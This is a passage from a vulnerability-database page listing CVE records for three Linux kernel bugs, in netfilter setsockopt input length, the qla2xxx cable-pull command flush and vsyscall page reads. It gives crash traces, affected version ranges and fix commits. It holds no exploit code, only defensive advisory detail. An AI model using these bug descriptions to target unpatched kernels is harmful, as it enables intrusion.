"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: validate user input for expected length\n\nI got multiple syzbot reports showing old bugs exposed\nby BPF after commit 20f2505fb436 (\"bpf: Try to avoid kzalloc\nin cgroup/{s,g}etsockopt\")\n\nsetsockopt() @optlen argument should be taken into account\nbefore copying data.\n\n BUG: KASAN: slab-out-of-bounds in copy_from_sockptr_offset include/linux/sockptr.h:49 [inline]\n BUG: KASAN: slab-out-of-bounds in copy_from_sockptr include/linux/sockptr.h:55 [inline]\n BUG: KASAN: slab-out-of-bounds in do_replace net/ipv4/netfilter/ip_tables.c:1111 [inline]\n BUG: KASAN: slab-out-of-bounds in do_ipt_set_ctl+0x902/0x3dd0 net/ipv4/netfilter/ip_tables.c:1627\nRead of size 96 at addr ffff88802cd73da0 by task syz-executor.4/7238\n\nCPU: 1 PID: 7238 Comm: syz-executor.4 Not tainted 6.9.0-rc2-next-20240403-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0x169/0x550 mm/kasan/report.c:488\n kasan_report+0x143/0x180 mm/kasan/report.c:601\n kasan_check_range+0x282/0x290 mm/kasan/generic.c:189\n __asan_memcpy+0x29/0x70 mm/kasan/shadow.c:105\n copy_from_sockptr_offset include/linux/sockptr.h:49 [inline]\n copy_from_sockptr include/linux/sockptr.h:55 [inline]\n do_replace net/ipv4/netfilter/ip_tables.c:1111 [inline]\n do_ipt_set_ctl+0x902/0x3dd0 net/ipv4/netfilter/ip_tables.c:1627\n nf_setsockopt+0x295/0x2c0 net/netfilter/nf_sockopt.c:101\n do_sock_setsockopt+0x3af/0x720 net/socket.c:2311\n __sys_setsockopt+0x1ae/0x250 net/socket.c:2334\n __do_sys_setsockopt net/socket.c:2343 [inline]\n __se_sys_setsockopt net/socket.c:2340 [inline]\n __x64_sys_setsockopt+0xb5/0xd0 net/socket.c:2340\n do_syscall_64+0xfb/0x240\n entry_SYSCALL_64_after_hwframe+0x72/0x7a\nRIP: 0033:0x7fd22067dde9\nCode: 28 00 00 00 75 05 48 83 c4 28 c3 e8 e1 20 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007fd21f9ff0c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000036\nRAX: ffffffffffffffda RBX: 00007fd2207abf80 RCX: 00007fd22067dde9\nRDX: 0000000000000040 RSI: 0000000000000000 RDI: 0000000000000003\nRBP: 00007fd2206ca47a R08: 0000000000000001 R09: 0000000000000000\nR10: 0000000020000880 R11: 0000000000000246 R12: 0000000000000000\nR13: 000000000000000b R14: 00007fd2207abf80 R15: 00007ffd2d0170d8\n \u003c/TASK\u003e\n\nAllocated by task 7238:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x3f/0x80 mm/kasan/common.c:68\n poison_kmalloc_redzone mm/kasan/common.c:370 [inline]\n __kasan_kmalloc+0x98/0xb0 mm/kasan/common.c:387\n kasan_kmalloc include/linux/kasan.h:211 [inline]\n __do_kmalloc_node mm/slub.c:4069 [inline]\n __kmalloc_noprof+0x200/0x410 mm/slub.c:4082\n kmalloc_noprof include/linux/slab.h:664 [inline]\n __cgroup_bpf_run_filter_setsockopt+0xd47/0x1050 kernel/bpf/cgroup.c:1869\n do_sock_setsockopt+0x6b4/0x720 net/socket.c:2293\n __sys_setsockopt+0x1ae/0x250 net/socket.c:2334\n __do_sys_setsockopt net/socket.c:2343 [inline]\n __se_sys_setsockopt net/socket.c:2340 [inline]\n __x64_sys_setsockopt+0xb5/0xd0 net/socket.c:2340\n do_syscall_64+0xfb/0x240\n entry_SYSCALL_64_after_hwframe+0x72/0x7a\n\nThe buggy address belongs to the object at ffff88802cd73da0\n which belongs to the cache kmalloc-8 of size 8\nThe buggy address is located 0 bytes inside of\n allocated 1-byte region [ffff88802cd73da0, ffff88802cd73da1)\n\nThe buggy address belongs to the physical page:\npage: refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff88802cd73020 pfn:0x2cd73\nflags: 0xfff80000000000(node=0|zone=1|lastcpupid=0xfff)\npage_type: 0xffffefff(slab)\nraw: 00fff80000000000 ffff888015041280 dead000000000100 dead000000000122\nraw: ffff88802cd73020 000000008080007f 00000001ffffefff 00\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:51.769Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0f038242b77ddfc505bf4163d4904c1abd2e74d6"
},
{
"url": "https://git.kernel.org/stable/c/440e948cf0eff32cfe322dcbca3f2525354b159b"
},
{
"url": "https://git.kernel.org/stable/c/18aae2cb87e5faa9c5bd865260ceadac60d5a6c5"
},
{
"url": "https://git.kernel.org/stable/c/81d51b9b7c95e791ba3c1a2dd77920a9d3b3f525"
},
{
"url": "https://git.kernel.org/stable/c/58f2bfb789e6bd3bc24a2c9c1580f3c67aec3018"
},
{
"url": "https://git.kernel.org/stable/c/0c83842df40f86e529db6842231154772c20edcc"
}
],
"title": "netfilter: validate user input for expected length",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35896",
"datePublished": "2024-05-19T08:34:51.034Z",
"dateReserved": "2024-05-17T13:50:33.114Z",
"dateUpdated": "2025-05-04T09:07:51.769Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26931 (GCVE-0-2024-26931)
Vulnerability from cvelistv5
Published
2024-05-01 05:17
Modified
2025-05-04 08:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix command flush on cable pull
System crash due to command failed to flush back to SCSI layer.
BUG: unable to handle kernel NULL pointer dereference at 0000000000000000
PGD 0 P4D 0
Oops: 0000 [#1] SMP NOPTI
CPU: 27 PID: 793455 Comm: kworker/u130:6 Kdump: loaded Tainted: G OE --------- - - 4.18.0-372.9.1.el8.x86_64 #1
Hardware name: HPE ProLiant DL360 Gen10/ProLiant DL360 Gen10, BIOS U32 09/03/2021
Workqueue: nvme-wq nvme_fc_connect_ctrl_work [nvme_fc]
RIP: 0010:__wake_up_common+0x4c/0x190
Code: 24 10 4d 85 c9 74 0a 41 f6 01 04 0f 85 9d 00 00 00 48 8b 43 08 48 83 c3 08 4c 8d 48 e8 49 8d 41 18 48 39 c3 0f 84 f0 00 00 00 <49> 8b 41 18 89 54 24 08 31 ed 4c 8d 70 e8 45 8b 29 41 f6 c5 04 75
RSP: 0018:ffff95f3e0cb7cd0 EFLAGS: 00010086
RAX: 0000000000000000 RBX: ffff8b08d3b26328 RCX: 0000000000000000
RDX: 0000000000000001 RSI: 0000000000000003 RDI: ffff8b08d3b26320
RBP: 0000000000000001 R08: 0000000000000000 R09: ffffffffffffffe8
R10: 0000000000000000 R11: ffff95f3e0cb7a60 R12: ffff95f3e0cb7d20
R13: 0000000000000003 R14: 0000000000000000 R15: 0000000000000000
FS: 0000000000000000(0000) GS:ffff8b2fdf6c0000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 0000002f1e410002 CR4: 00000000007706e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
PKRU: 55555554
Call Trace:
__wake_up_common_lock+0x7c/0xc0
qla_nvme_ls_req+0x355/0x4c0 [qla2xxx]
qla2xxx [0000:12:00.1]-f084:3: qlt_free_session_done: se_sess 0000000000000000 / sess ffff8ae1407ca000 from port 21:32:00:02:ac:07:ee:b8 loop_id 0x02 s_id 01:02:00 logout 1 keep 0 els_logo 0
? __nvme_fc_send_ls_req+0x260/0x380 [nvme_fc]
qla2xxx [0000:12:00.1]-207d:3: FCPort 21:32:00:02:ac:07:ee:b8 state transitioned from ONLINE to LOST - portid=010200.
? nvme_fc_send_ls_req.constprop.42+0x1a/0x45 [nvme_fc]
qla2xxx [0000:12:00.1]-2109:3: qla2x00_schedule_rport_del 21320002ac07eeb8. rport ffff8ae598122000 roles 1
? nvme_fc_connect_ctrl_work.cold.63+0x1e3/0xa7d [nvme_fc]
qla2xxx [0000:12:00.1]-f084:3: qlt_free_session_done: se_sess 0000000000000000 / sess ffff8ae14801e000 from port 21:32:01:02:ad:f7:ee:b8 loop_id 0x04 s_id 01:02:01 logout 1 keep 0 els_logo 0
? __switch_to+0x10c/0x450
? process_one_work+0x1a7/0x360
qla2xxx [0000:12:00.1]-207d:3: FCPort 21:32:01:02:ad:f7:ee:b8 state transitioned from ONLINE to LOST - portid=010201.
? worker_thread+0x1ce/0x390
? create_worker+0x1a0/0x1a0
qla2xxx [0000:12:00.1]-2109:3: qla2x00_schedule_rport_del 21320102adf7eeb8. rport ffff8ae3b2312800 roles 70
? kthread+0x10a/0x120
qla2xxx [0000:12:00.1]-2112:3: qla_nvme_unregister_remote_port: unregister remoteport on ffff8ae14801e000 21320102adf7eeb8
? set_kthread_struct+0x40/0x40
qla2xxx [0000:12:00.1]-2110:3: remoteport_delete of ffff8ae14801e000 21320102adf7eeb8 completed.
? ret_from_fork+0x1f/0x40
qla2xxx [0000:12:00.1]-f086:3: qlt_free_session_done: waiting for sess ffff8ae14801e000 logout
The system was under memory stress where driver was not able to allocate an
SRB to carry out error recovery of cable pull. The failure to flush causes
upper layer to start modifying scsi_cmnd. When the system frees up some
memory, the subsequent cable pull trigger another command flush. At this
point the driver access a null pointer when attempting to DMA unmap the
SGL.
Add a check to make sure commands are flush back on session tear down to
prevent the null pointer access.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.629Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b73377124f56d2fec154737c2f8d2e839c237d5a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d7a68eee87b05d4e29419e6f151aef99314970a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/67b2d35853c2da25a8ca1c4190a5e96d3083c2ac"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a859f6a8f4234b8ef62862bf7a92f1af5f8cd47a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/09c0ac18cac206ed1218b1fe6c1a0918e5ea9211"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8de1584ec4fe0ebea33c273036e7e0a05e65c81d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f0d32004e3a572bb77e6c11c2797c87f8c9703d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec7587eef003cab15a13446d67c3adb88146a150"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a27d4d0e7de305def8a5098a614053be208d1aa1"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26931",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:45:55.384223Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:53.290Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_target.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b73377124f56d2fec154737c2f8d2e839c237d5a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d7a68eee87b05d4e29419e6f151aef99314970a9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "67b2d35853c2da25a8ca1c4190a5e96d3083c2ac",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a859f6a8f4234b8ef62862bf7a92f1af5f8cd47a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "09c0ac18cac206ed1218b1fe6c1a0918e5ea9211",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8de1584ec4fe0ebea33c273036e7e0a05e65c81d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8f0d32004e3a572bb77e6c11c2797c87f8c9703d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ec7587eef003cab15a13446d67c3adb88146a150",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a27d4d0e7de305def8a5098a614053be208d1aa1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_target.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Fix command flush on cable pull\n\nSystem crash due to command failed to flush back to SCSI layer.\n\n BUG: unable to handle kernel NULL pointer dereference at 0000000000000000\n PGD 0 P4D 0\n Oops: 0000 [#1] SMP NOPTI\n CPU: 27 PID: 793455 Comm: kworker/u130:6 Kdump: loaded Tainted: G OE --------- - - 4.18.0-372.9.1.el8.x86_64 #1\n Hardware name: HPE ProLiant DL360 Gen10/ProLiant DL360 Gen10, BIOS U32 09/03/2021\n Workqueue: nvme-wq nvme_fc_connect_ctrl_work [nvme_fc]\n RIP: 0010:__wake_up_common+0x4c/0x190\n Code: 24 10 4d 85 c9 74 0a 41 f6 01 04 0f 85 9d 00 00 00 48 8b 43 08 48 83 c3 08 4c 8d 48 e8 49 8d 41 18 48 39 c3 0f 84 f0 00 00 00 \u003c49\u003e 8b 41 18 89 54 24 08 31 ed 4c 8d 70 e8 45 8b 29 41 f6 c5 04 75\n RSP: 0018:ffff95f3e0cb7cd0 EFLAGS: 00010086\n RAX: 0000000000000000 RBX: ffff8b08d3b26328 RCX: 0000000000000000\n RDX: 0000000000000001 RSI: 0000000000000003 RDI: ffff8b08d3b26320\n RBP: 0000000000000001 R08: 0000000000000000 R09: ffffffffffffffe8\n R10: 0000000000000000 R11: ffff95f3e0cb7a60 R12: ffff95f3e0cb7d20\n R13: 0000000000000003 R14: 0000000000000000 R15: 0000000000000000\n FS: 0000000000000000(0000) GS:ffff8b2fdf6c0000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 0000002f1e410002 CR4: 00000000007706e0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 55555554\n Call Trace:\n __wake_up_common_lock+0x7c/0xc0\n qla_nvme_ls_req+0x355/0x4c0 [qla2xxx]\n qla2xxx [0000:12:00.1]-f084:3: qlt_free_session_done: se_sess 0000000000000000 / sess ffff8ae1407ca000 from port 21:32:00:02:ac:07:ee:b8 loop_id 0x02 s_id 01:02:00 logout 1 keep 0 els_logo 0\n ? __nvme_fc_send_ls_req+0x260/0x380 [nvme_fc]\n qla2xxx [0000:12:00.1]-207d:3: FCPort 21:32:00:02:ac:07:ee:b8 state transitioned from ONLINE to LOST - portid=010200.\n ? nvme_fc_send_ls_req.constprop.42+0x1a/0x45 [nvme_fc]\n qla2xxx [0000:12:00.1]-2109:3: qla2x00_schedule_rport_del 21320002ac07eeb8. rport ffff8ae598122000 roles 1\n ? nvme_fc_connect_ctrl_work.cold.63+0x1e3/0xa7d [nvme_fc]\n qla2xxx [0000:12:00.1]-f084:3: qlt_free_session_done: se_sess 0000000000000000 / sess ffff8ae14801e000 from port 21:32:01:02:ad:f7:ee:b8 loop_id 0x04 s_id 01:02:01 logout 1 keep 0 els_logo 0\n ? __switch_to+0x10c/0x450\n ? process_one_work+0x1a7/0x360\n qla2xxx [0000:12:00.1]-207d:3: FCPort 21:32:01:02:ad:f7:ee:b8 state transitioned from ONLINE to LOST - portid=010201.\n ? worker_thread+0x1ce/0x390\n ? create_worker+0x1a0/0x1a0\n qla2xxx [0000:12:00.1]-2109:3: qla2x00_schedule_rport_del 21320102adf7eeb8. rport ffff8ae3b2312800 roles 70\n ? kthread+0x10a/0x120\n qla2xxx [0000:12:00.1]-2112:3: qla_nvme_unregister_remote_port: unregister remoteport on ffff8ae14801e000 21320102adf7eeb8\n ? set_kthread_struct+0x40/0x40\n qla2xxx [0000:12:00.1]-2110:3: remoteport_delete of ffff8ae14801e000 21320102adf7eeb8 completed.\n ? ret_from_fork+0x1f/0x40\n qla2xxx [0000:12:00.1]-f086:3: qlt_free_session_done: waiting for sess ffff8ae14801e000 logout\n\nThe system was under memory stress where driver was not able to allocate an\nSRB to carry out error recovery of cable pull. The failure to flush causes\nupper layer to start modifying scsi_cmnd. When the system frees up some\nmemory, the subsequent cable pull trigger another command flush. At this\npoint the driver access a null pointer when attempting to DMA unmap the\nSGL.\n\nAdd a check to make sure commands are flush back on session tear down to\nprevent the null pointer access."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:58.177Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b73377124f56d2fec154737c2f8d2e839c237d5a"
},
{
"url": "https://git.kernel.org/stable/c/d7a68eee87b05d4e29419e6f151aef99314970a9"
},
{
"url": "https://git.kernel.org/stable/c/67b2d35853c2da25a8ca1c4190a5e96d3083c2ac"
},
{
"url": "https://git.kernel.org/stable/c/a859f6a8f4234b8ef62862bf7a92f1af5f8cd47a"
},
{
"url": "https://git.kernel.org/stable/c/09c0ac18cac206ed1218b1fe6c1a0918e5ea9211"
},
{
"url": "https://git.kernel.org/stable/c/8de1584ec4fe0ebea33c273036e7e0a05e65c81d"
},
{
"url": "https://git.kernel.org/stable/c/8f0d32004e3a572bb77e6c11c2797c87f8c9703d"
},
{
"url": "https://git.kernel.org/stable/c/ec7587eef003cab15a13446d67c3adb88146a150"
},
{
"url": "https://git.kernel.org/stable/c/a27d4d0e7de305def8a5098a614053be208d1aa1"
}
],
"title": "scsi: qla2xxx: Fix command flush on cable pull",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26931",
"datePublished": "2024-05-01T05:17:14.823Z",
"dateReserved": "2024-02-19T14:20:24.195Z",
"dateUpdated": "2025-05-04T08:59:58.177Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26906 (GCVE-0-2024-26906)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
x86/mm: Disallow vsyscall page read for copy_from_kernel_nofault()
When trying to use copy_from_kernel_nofault() to read vsyscall page
through a bpf program, the following oops was reported:
BUG: unable to handle page fault for address: ffffffffff600000
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 3231067 P4D 3231067 PUD 3233067 PMD 3235067 PTE 0
Oops: 0000 [#1] PREEMPT SMP PTI
CPU: 1 PID: 20390 Comm: test_progs ...... 6.7.0+ #58
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) ......
RIP: 0010:copy_from_kernel_nofault+0x6f/0x110
......
Call Trace:
<TASK>
? copy_from_kernel_nofault+0x6f/0x110
bpf_probe_read_kernel+0x1d/0x50
bpf_prog_2061065e56845f08_do_probe_read+0x51/0x8d
trace_call_bpf+0xc5/0x1c0
perf_call_bpf_enter.isra.0+0x69/0xb0
perf_syscall_enter+0x13e/0x200
syscall_trace_enter+0x188/0x1c0
do_syscall_64+0xb5/0xe0
entry_SYSCALL_64_after_hwframe+0x6e/0x76
</TASK>
......
---[ end trace 0000000000000000 ]---
The oops is triggered when:
1) A bpf program uses bpf_probe_read_kernel() to read from the vsyscall
page and invokes copy_from_kernel_nofault() which in turn calls
__get_user_asm().
2) Because the vsyscall page address is not readable from kernel space,
a page fault exception is triggered accordingly.
3) handle_page_fault() considers the vsyscall page address as a user
space address instead of a kernel space address. This results in the
fix-up setup by bpf not being applied and a page_fault_oops() is invoked
due to SMAP.
Considering handle_page_fault() has already considered the vsyscall page
address as a userspace address, fix the problem by disallowing vsyscall
page read for copy_from_kernel_nofault().
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.490Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e4694e65b6db4c3de125115dd4f55848cc48381"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8a67fe34b76a49320b33032228a794f40b0316b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f175de546a3eb77614d94d4c02550181c0a8493e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/57f78c46f08198e1be08ffe99c4c1ccc12855bf5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/29bd6f86904682adafe9affbc7f79b14defcaff8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/32019c659ecfe1d92e3bf9fcdfbb11a7c70acd58"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26906",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:47:59.842385Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:22.186Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/mm/maccess.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6e4694e65b6db4c3de125115dd4f55848cc48381",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e8a67fe34b76a49320b33032228a794f40b0316b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f175de546a3eb77614d94d4c02550181c0a8493e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "57f78c46f08198e1be08ffe99c4c1ccc12855bf5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "29bd6f86904682adafe9affbc7f79b14defcaff8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "32019c659ecfe1d92e3bf9fcdfbb11a7c70acd58",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/mm/maccess.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
